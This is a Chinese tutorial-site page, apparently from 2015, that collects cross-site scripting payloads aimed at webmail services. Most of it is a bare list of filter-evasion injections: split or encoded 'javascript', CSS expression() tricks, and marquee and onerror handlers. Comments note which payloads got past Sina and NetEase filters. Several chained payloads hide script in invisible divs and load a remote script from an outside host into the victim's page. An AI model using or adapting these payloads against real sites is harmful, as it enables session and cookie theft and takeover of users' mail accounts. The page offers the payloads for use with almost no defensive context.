网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

邮箱跨站代码收集 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] scriptalert(dddd)scriptscriptalert(#39;test#39;)/script----------------------------TOM-------------------------------------------------------------------img src=http://www.2cto.com/u......

<script>alert("dddd")<script>
 
<script>alert('test')</script>
 
----------------------------TOM-------------------------------------------------------------------
<img src=http://up.2cto.com/2012/1218/20121218013340854.gif" width=0 height=0 ononloadload="alert(52)">52
<img src=http://up.2cto.com/2012/1218/20121218013340854.gif" width=0 height=0 onload="alert(53)">53
<img src=http://up.2cto.com/2012/1218/20121218013340854.gif" width=0 height=0 /**/onload="alert(54)">54
<ba="<script>alert(55);</script>"55
<img/*****/src=# width=0 height=0 /***/onerror=alert(56)>56
<iframe/**/src=http://www.baidu.com>57</iframe>
<img src=http://up.2cto.com/2012/1218/20121218013340146.gif onreadystatechange=alert(58)>58
<image src=http://up.2cto.com/2012/1218/20121218013340146.gif onreadystatechange=alert(59)>59
<style onreadystatechange=alert(60)>60</style>
<xml onreadystatechange=alert(61)>xxxx</xml>61
<object type=image src=http://up.2cto.com/2012/1218/20121218013340146.gif onreadystatechange=alert(62)>62
<img type=image src=http://up.2cto.com/2012/1218/20121218013340146.gif onreadystatechange=alert(63)>63
<P STYLE="behavior:url('#default#time2')" onEnd=alert(64)>64
<P STYLE="behavior:url('#default#time2')" onBegin=alert(65)>65
<style><img src="</style><img src=x onerror=alert(66)//">66
 
----------------------------------------------------------------------------------------------
 
<DIV STYLE="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0061\006C\0065\0072\0074\0028\002F\0078\0073\0073\002F\0029\0029">
 
<frameset onload=alert(1)>
 
 
<IMG SRC="jav ascript:alert('XSS-1');">
 
 
<IMG """><SCRIPT>alert("XSS-2")</SCRIPT>">
 
 
Hello,80sec  </xss style="x:expression(alert(document.cookie))">
 
 
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
 
 
 
<img src=http://up.2cto.com/2012/1218/20121218013340989.gif onLoad=alert(/xss-3/);>
 
 
 
<img src="javascrip&#116&#58alert(/xss-4/)" width=100>
 
 
<img src="#" style="Xss:expression(alert(/xss-5/));">
 
 
<style>
input {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))
</style>  
<input type="text">
 
 
<style>
a {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))
</style>
<a></a>
 
 
<marquee style="background-color:red" onstart="alert('monyer')" >asdf</marquee>
 
 
 
<div>\n<marquee style=\"BACKGROUND-COLOR:red;\" onstart="alert('monyer')"\n>asdf<\/marquee><\/div>
 
 
<img src=<marquee style="background-color:red" onstart="alert('monyer')"  onerror=alert(/XSS-6/)>></marquee>
 
<img src=<marquee style="background-color:red" onstart="alert('monyer')"  onerror=onerror=alert(/XSS-7/)>><marquee>
 
<img src=<marquee style="background-color:red" onstart="alert(/"/")  onerror=onerror=alert(/XSS-8/)>><marquee> 
这个新浪只差一个"闭合了
 
 
 
 
<img src="<marquee style="background-color:red" onstart="alert("(")  onerror=onerror=alert(/XSS-9/)>><marquee>
 
 
 
 
<img src=" http://xss.jpg"“‘; onerror=alert('onerror=')>
这个新浪不让加入
 
 
<img src=" http://xss.jpg" onerror=alert('onerror=')>
 
 
 
<img src=" http://xss.jpg" style=\"BACKGROUND-COLOR:red;\" onerror=alert('onerror=')>
 
 
 
<DIV style="xss:ex/*ss*/pression(alert('http://hi.baidu.com/ycosxhack'))"></DIV>
 
 
 
<img src=" http://xss.jpg" onerror=alert('XSS-10')>
 
 
 
<IMG onerror="alert('XSS-11')" src=" http://xss.jpg">
 
 
 
<img src=http onerror=alert(/XSS-12/)>
 
 
 
 
<div style="background-color:red" onmouseenter="alert('monyer')">123456</div>
 
 
 
 
 
<HTML><HEAD>
</HEAD>
<BODY>
<P>参加</P>
<div id="nini" style="display:none">window.xx=2;var f=document.createElement('script');f.src='http://www.mail-query.com/test.js'.replace(/!/g,String.fromCharCode(38));document.getElementsByTagName('head')[0].appendChild(f)</div><style><!--a{font-size:14px;font-family:arial,verdana,sans-serif;</style><div>;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(window.xx!=2?eval(nini.innerHTML):1);</div><style>}--></style><a></a><img width="1" height="1" src="http://www.mail-query.com/test.js">
</BODY></HTML>
 
网易最新的xss
 
 
 
 
 
 
<script defer="defer">var a,b,c,d,e;a="http:";b="//";c="www";d=".baidu";e=".com";window.open(a+b+c+d+e,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");</script>
 
 
---------
 
 
<div id="aaa" style="display:none"></div>
<div id="llyy" style="display:none">
if(parent.window.x!='1')
{
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www.mail-query.com/test.js';
parent.document.body.appendChild(script1);
}
</div>
<HTML XMLNS:t="urn:schemas-microsoft-com:time">
<div>1<t:animate style="behavior:url(#default#time2)" attributename=innerhtml values=&lt;img/src=`.`style=`display:none`onerror=eval(llyy.innerHTML)&gt;></div>
 
 
 
---------
 
 
 
 
<div id="aaa" style="display:none"></div>
<div id="llyy" style="display:none">
if(parent.window.x!='1')
{
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www.mail-query.com/test.js';
parent.document.body.appendChild(script1);

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论